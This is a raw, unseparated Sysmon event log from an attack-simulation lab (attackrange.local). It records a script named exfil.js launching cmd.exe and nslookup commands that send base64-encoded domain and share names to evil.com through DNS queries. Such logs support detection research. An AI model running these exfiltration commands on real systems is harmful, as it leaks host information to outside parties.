14:16:29.997{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.997{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-4340-000000005F02}6044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.997{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.997{2E1864BB-17BD-629A-4140-000000005F02}66607704C:\Windows\system32\cmd.exe{2E1864BB-17BE-629A-4340-000000005F02}6044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.010{2E1864BB-17BE-629A-4340-000000005F02}6044C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BD-629A-4140-000000005F02}6660C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkatje.tmp 2>&1 354300x800000000000000043936Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:28.714{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52325-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043935Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:30.495{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB120DA8BBD82404DA464BFD30F3D168,SHA256=155FBB098F9309ECF58992013C335DCE4AF27BC999A2AB66F2D093EAC8C05715,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.979{2E1864BB-17BF-629A-8140-000000005F02}47765416C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-8240-000000005F02}7628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.979{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.979{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.979{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.979{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.979{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-8240-000000005F02}7628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.979{2E1864BB-17BF-629A-8040-000000005F02}70603916C:\Windows\system32\cmd.exe{2E1864BB-17BF-629A-8240-000000005F02}7628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.990{2E1864BB-17BF-629A-8240-000000005F02}7628C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BF-629A-8040-000000005F02}7060C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzygl.tmp 2>&1 10341000x8000000000000000200550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.963{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-8140-000000005F02}4776C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.963{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-8140-000000005F02}4776C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.948{2E1864BB-17BF-629A-8140-000000005F02}47765416C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-8040-000000005F02}7060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.932{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-8140-000000005F02}4776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.916{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.916{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.916{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.490{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52726- 10341000x8000000000000000200542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.916{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.490{00000000-0000-0000-0000-000000000000}7432<unknown process>-udpfalsefalse127.0.0.1-52725-false127.0.0.1-53domain 10341000x8000000000000000200540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.916{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-8040-000000005F02}7060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000200539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.490{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52725- 354300x8000000000000000200538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.490{00000000-0000-0000-0000-000000000000}7432<unknown process>-udptruefalse127.0.0.1-52725-false127.0.0.1-53domain 10341000x8000000000000000200537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.916{2E1864BB-17A1-629A-783D-000000005F02}55524208C:\Windows\System32\WScript.exe{2E1864BB-17BF-629A-8040-000000005F02}7060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.489{00000000-0000-0000-0000-000000000000}7432<unknown process>-udpfalsefalse127.0.0.1-52724-false127.0.0.1-53domain 354300x8000000000000000200535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.489{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52724- 354300x8000000000000000200534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.489{00000000-0000-0000-0000-000000000000}7432<unknown process>-udptruefalse127.0.0.1-52724-false127.0.0.1-53domain 354300x8000000000000000200533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.384{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52723- 354300x8000000000000000200532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.384{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52722- 354300x8000000000000000200531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.384{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52721- 154100x8000000000000000200530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.928{2E1864BB-17BF-629A-8040-000000005F02}7060C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzygl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.916{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljzvjy.tmpMD5=74AA98EC4B1C82029578D90E2343E510,SHA256=BCED258190799681E04DEC80A23A2247E8F332523DBBC8B2CBECAB9A40B2F90E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.895{2E1864BB-17BF-629A-7E40-000000005F02}55886396C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-7F40-000000005F02}8132C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.895{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7F40-000000005F02}8132C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.895{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.